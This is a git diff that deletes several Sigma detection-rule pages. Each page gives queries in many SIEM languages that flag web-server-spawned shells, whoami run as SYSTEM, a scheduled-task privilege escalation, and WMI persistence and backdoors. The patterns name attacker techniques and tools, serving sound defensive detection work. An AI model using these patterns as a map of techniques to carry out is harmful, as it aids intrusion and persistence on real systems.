-                    "query": "(winlog.event_data.ParentImage.keyword:(*\\\\w3wp.exe OR *\\\\httpd.exe OR *\\\\nginx.exe OR *\\\\php\\-cgi.exe OR *\\\\tomcat.exe) AND winlog.event_data.Image.keyword:(*\\\\cmd.exe OR *\\\\sh.exe OR *\\\\bash.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Shells Spawned by Web Servers'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(ParentImage.keyword:(*\\w3wp.exe *\\httpd.exe *\\nginx.exe *\\php\-cgi.exe *\\tomcat.exe) AND Image.keyword:(*\\cmd.exe *\\sh.exe *\\bash.exe *\\powershell.exe *\\bitsadmin.exe))
-```
-
-
-### splunk
-    
-```
-((ParentImage="*\\w3wp.exe" OR ParentImage="*\\httpd.exe" OR ParentImage="*\\nginx.exe" OR ParentImage="*\\php-cgi.exe" OR ParentImage="*\\tomcat.exe") (Image="*\\cmd.exe" OR Image="*\\sh.exe" OR Image="*\\bash.exe" OR Image="*\\powershell.exe" OR Image="*\\bitsadmin.exe")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage IN ["*\\w3wp.exe", "*\\httpd.exe", "*\\nginx.exe", "*\\php-cgi.exe", "*\\tomcat.exe"] Image IN ["*\\cmd.exe", "*\\sh.exe", "*\\bash.exe", "*\\powershell.exe", "*\\bitsadmin.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\w3wp\.exe|.*.*\httpd\.exe|.*.*\nginx\.exe|.*.*\php-cgi\.exe|.*.*\tomcat\.exe))(?=.*(?:.*.*\cmd\.exe|.*.*\sh\.exe|.*.*\bash\.exe|.*.*\powershell\.exe|.*.*\bitsadmin\.exe)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_whoami_as_system.md b/Atomic_Threat_Coverage/Detection_Rules/win_whoami_as_system.md
deleted file mode 100644
index a766bf2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_whoami_as_system.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Run Whoami as SYSTEM       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1033: System Owner/User Discovery](https://attack.mitre.org/techniques/T1033)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1033: System Owner/User Discovery](../Triggers/T1033.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment](https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Run Whoami as SYSTEM
-id: 80167ada-7a12-41ed-b8e9-aa47195c66a1
-status: experimental
-description: Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.
-references:
-    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
-author: Teymur Kheirkhabarov
-date: 2019/10/23
-modified: 2019/11/11
-tags:
-    - attack.discovery
-    - attack.privilege_escalation
-    - attack.t1033
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        User: 'NT AUTHORITY\SYSTEM'
-        Image|endswith: '\whoami.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "User.*NT AUTHORITY\\SYSTEM" -and $_.message -match "Image.*.*\\whoami.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.User:"NT\ AUTHORITY\\SYSTEM" AND winlog.event_data.Image.keyword:*\\whoami.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/80167ada-7a12-41ed-b8e9-aa47195c66a1 <<EOF
-{
-  "metadata": {
-    "title": "Run Whoami as SYSTEM",
-    "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.",
-    "tags": [
-      "attack.discovery",
-      "attack.privilege_escalation",
-      "attack.t1033"
-    ],
-    "query": "(winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\" AND winlog.event_data.Image.keyword:*\\\\whoami.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.User:\"NT\\ AUTHORITY\\\\SYSTEM\" AND winlog.event_data.Image.keyword:*\\\\whoami.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Run Whoami as SYSTEM'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(User:"NT AUTHORITY\\SYSTEM" AND Image.keyword:*\\whoami.exe)
-```
-
-
-### splunk
-    
-```
-(User="NT AUTHORITY\\SYSTEM" Image="*\\whoami.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" User="NT AUTHORITY\\SYSTEM" Image="*\\whoami.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*NT AUTHORITY\SYSTEM)(?=.*.*\whoami\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_win10_sched_task_0day.md b/Atomic_Threat_Coverage/Detection_Rules/win_win10_sched_task_0day.md
deleted file mode 100644
index 041714a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_win10_sched_task_0day.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Windows 10 Scheduled Task SandboxEscaper 0-day       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Task Scheduler .job import arbitrary DACL write\par |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe](https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe)</li></ul>  |
-| **Author**               | Olaf Hartong |
-| Other Tags           | <ul><li>car.2013-08-001</li><li>attack.t1053.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Windows 10 Scheduled Task SandboxEscaper 0-day
-id: 931b6802-d6a6-4267-9ffa-526f57f22aaf
-status: experimental
-description: Detects Task Scheduler .job import arbitrary DACL write\par
-references:
-    - https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe
-author: Olaf Hartong
-date: 2019/05/22
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\schtasks.exe'
-        CommandLine: '*/change*/TN*/RU*/RP*'
-    condition: selection
-falsepositives:
-    - Unknown
-tags:
-    - attack.privilege_escalation
-    - attack.execution
-    - attack.t1053
-    - car.2013-08-001
-    - attack.t1053.005
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\schtasks.exe" -and $_.message -match "CommandLine.*.*/change.*/TN.*/RU.*/RP.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:*\\schtasks.exe AND winlog.event_data.CommandLine.keyword:*\/change*\/TN*\/RU*\/RP*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/931b6802-d6a6-4267-9ffa-526f57f22aaf <<EOF
-{
-  "metadata": {
-    "title": "Windows 10 Scheduled Task SandboxEscaper 0-day",
-    "description": "Detects Task Scheduler .job import arbitrary DACL write\\par",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.execution",
-      "attack.t1053",
-      "car.2013-08-001",
-      "attack.t1053.005"
-    ],
-    "query": "(winlog.event_data.Image.keyword:*\\\\schtasks.exe AND winlog.event_data.CommandLine.keyword:*\\/change*\\/TN*\\/RU*\\/RP*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\schtasks.exe AND winlog.event_data.CommandLine.keyword:*\\/change*\\/TN*\\/RU*\\/RP*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows 10 Scheduled Task SandboxEscaper 0-day'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\schtasks.exe AND CommandLine.keyword:*\/change*\/TN*\/RU*\/RP*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\schtasks.exe" CommandLine="*/change*/TN*/RU*/RP*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\schtasks.exe" CommandLine="*/change*/TN*/RU*/RP*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\schtasks\.exe)(?=.*.*/change.*/TN.*/RU.*/RP.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_backdoor_exchange_transport_agent.md b/Atomic_Threat_Coverage/Detection_Rules/win_wmi_backdoor_exchange_transport_agent.md
deleted file mode 100644
index 15e898c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_backdoor_exchange_transport_agent.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | WMI Backdoor Exchange Transport Agent       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a WMi backdoor in Exchange Transport Agents via WMi event filters |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1084: Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1084)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/cglyer/status/1182389676876980224](https://twitter.com/cglyer/status/1182389676876980224)</li><li>[https://twitter.com/cglyer/status/1182391019633029120](https://twitter.com/cglyer/status/1182391019633029120)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1546.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMI Backdoor Exchange Transport Agent
-id: 797011dc-44f4-4e6f-9f10-a8ceefbe566b
-status: experimental
-description: Detects a WMi backdoor in Exchange Transport Agents via WMi event filters
-author: Florian Roth
-date: 2019/10/11
-references:
-    - https://twitter.com/cglyer/status/1182389676876980224
-    - https://twitter.com/cglyer/status/1182391019633029120
-logsource:
-    category: process_creation
-    product: windows
-tags:
-    - attack.persistence
-    - attack.t1084
-    - attack.t1546.003
-detection:
-    selection:
-        ParentImage: '*\EdgeTransport.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "ParentImage.*.*\\EdgeTransport.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.ParentImage.keyword:*\\EdgeTransport.exe
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/797011dc-44f4-4e6f-9f10-a8ceefbe566b <<EOF
-{
-  "metadata": {
-    "title": "WMI Backdoor Exchange Transport Agent",
-    "description": "Detects a WMi backdoor in Exchange Transport Agents via WMi event filters",
-    "tags": [
-      "attack.persistence",
-      "attack.t1084",
-      "attack.t1546.003"
-    ],
-    "query": "winlog.event_data.ParentImage.keyword:*\\\\EdgeTransport.exe"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.ParentImage.keyword:*\\\\EdgeTransport.exe",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMI Backdoor Exchange Transport Agent'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-ParentImage.keyword:*\\EdgeTransport.exe
-```
-
-
-### splunk
-    
-```
-ParentImage="*\\EdgeTransport.exe"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ParentImage="*\\EdgeTransport.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\EdgeTransport\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence.md b/Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence.md
deleted file mode 100644
index 46ad6bd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence.md
+++ /dev/null
@@ -1,183 +0,0 @@
-| Title                    | WMI Persistence       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious WMI event filter and command line event consumer based on event id 5861 and 5859 (Windows 10, 2012 and higher) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown (data set is too small; further testing needed)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/mattifestation/status/899646620148539397](https://twitter.com/mattifestation/status/899646620148539397)</li><li>[https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/](https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMI Persistence
-id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b
-status: experimental
-description: Detects suspicious WMI event filter and command line event consumer based on event id 5861 and 5859 (Windows 10, 2012 and higher)
-author: Florian Roth
-date: 2017/08/22
-references:
-    - https://twitter.com/mattifestation/status/899646620148539397
-    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
-tags:
-    - attack.execution
-    - attack.persistence
-    - attack.t1047
-logsource:
-    product: windows
-    service: wmi
-detection:
-    selection:
-        EventID: 5861
-    keywords:
-        Message:
-            - '*ActiveScriptEventConsumer*'
-            - '*CommandLineEventConsumer*'
-            - '*CommandLineTemplate*'
-        # - 'Binding EventFilter'  # too many false positive with HP Health Driver
-    selection2:
-        EventID: 5859
-    condition: selection and 1 of keywords or selection2
-falsepositives:
-    - Unknown (data set is too small; further testing needed)
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-WMI-Activity/Operational | where {((($_.ID -eq "5861" -and ($_.message -match "Message.*.*ActiveScriptEventConsumer.*" -or $_.message -match "Message.*.*CommandLineEventConsumer.*" -or $_.message -match "Message.*.*CommandLineTemplate.*")) -or $_.ID -eq "5859")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_id:"5861" AND Message.keyword:(*ActiveScriptEventConsumer* OR *CommandLineEventConsumer* OR *CommandLineTemplate*)) OR winlog.event_id:"5859")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0b7889b4-5577-4521-a60a-3376ee7f9f7b <<EOF
-{
-  "metadata": {
-    "title": "WMI Persistence",
-    "description": "Detects suspicious WMI event filter and command line event consumer based on event id 5861 and 5859 (Windows 10, 2012 and higher)",
-    "tags": [
-      "attack.execution",
-      "attack.persistence",
-      "attack.t1047"
-    ],
-    "query": "((winlog.event_id:\"5861\" AND Message.keyword:(*ActiveScriptEventConsumer* OR *CommandLineEventConsumer* OR *CommandLineTemplate*)) OR winlog.event_id:\"5859\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_id:\"5861\" AND Message.keyword:(*ActiveScriptEventConsumer* OR *CommandLineEventConsumer* OR *CommandLineTemplate*)) OR winlog.event_id:\"5859\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMI Persistence'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"5861" AND Message.keyword:(*ActiveScriptEventConsumer* *CommandLineEventConsumer* *CommandLineTemplate*)) OR EventID:"5859")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-WMI-Activity/Operational" ((EventCode="5861" (Message="*ActiveScriptEventConsumer*" OR Message="*CommandLineEventConsumer*" OR Message="*CommandLineTemplate*")) OR EventCode="5859"))
-```
-
-
-### logpoint
-    
-```
-((event_id="5861" Message IN ["*ActiveScriptEventConsumer*", "*CommandLineEventConsumer*", "*CommandLineTemplate*"]) OR event_id="5859")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*5861)(?=.*(?:.*.*ActiveScriptEventConsumer.*|.*.*CommandLineEventConsumer.*|.*.*CommandLineTemplate.*)))|.*5859))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence_script_event_consumer.md b/Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence_script_event_consumer.md
deleted file mode 100644
index 5fce2eb..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_persistence_script_event_consumer.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | WMI Persistence - Script Event Consumer       |
-|:-------------------------|:------------------|
-| **Description**          | Detects WMI script event consumers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate event consumers</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/](https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/)</li></ul>  |
-| **Author**               | Thomas Patzke |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMI Persistence - Script Event Consumer
-id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e
-status: experimental
-description: Detects WMI script event consumers
-references:
-    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
-author: Thomas Patzke
-date: 2018/03/07
-tags:
-    - attack.execution
-    - attack.persistence
-    - attack.t1047
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: C:\WINDOWS\system32\wbem\scrcons.exe
-        ParentImage: C:\Windows\System32\svchost.exe
-    condition: selection
-falsepositives:
-    - Legitimate event consumers
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*C:\\WINDOWS\\system32\\wbem\\scrcons.exe" -and $_.message -match "ParentImage.*C:\\Windows\\System32\\svchost.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image:"C\:\\WINDOWS\\system32\\wbem\\scrcons.exe" AND winlog.event_data.ParentImage:"C\:\\Windows\\System32\\svchost.exe")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e <<EOF
-{
-  "metadata": {
-    "title": "WMI Persistence - Script Event Consumer",
-    "description": "Detects WMI script event consumers",
-    "tags": [
-      "attack.execution",
-      "attack.persistence",
-      "attack.t1047"
-    ],
-    "query": "(winlog.event_data.Image:\"C\\:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe\" AND winlog.event_data.ParentImage:\"C\\:\\\\Windows\\\\System32\\\\svchost.exe\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image:\"C\\:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe\" AND winlog.event_data.ParentImage:\"C\\:\\\\Windows\\\\System32\\\\svchost.exe\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMI Persistence - Script Event Consumer'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image:"C\:\\WINDOWS\\system32\\wbem\\scrcons.exe" AND ParentImage:"C\:\\Windows\\System32\\svchost.exe")
-```
-
-
-### splunk
-    
-```
-(Image="C:\\WINDOWS\\system32\\wbem\\scrcons.exe" ParentImage="C:\\Windows\\System32\\svchost.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="C:\\WINDOWS\\system32\\wbem\\scrcons.exe" ParentImage="C:\\Windows\\System32\\svchost.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*C:\WINDOWS\system32\wbem\scrcons\.exe)(?=.*C:\Windows\System32\svchost\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_spwns_powershell.md b/Atomic_Threat_Coverage/Detection_Rules/win_wmi_spwns_powershell.md
deleted file mode 100644
index 50522f6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_wmi_spwns_powershell.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | WMI Spawning Windows PowerShell       |
-|:-------------------------|:------------------|
-| **Description**          | Detects WMI spawning PowerShell |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li></ul>  |
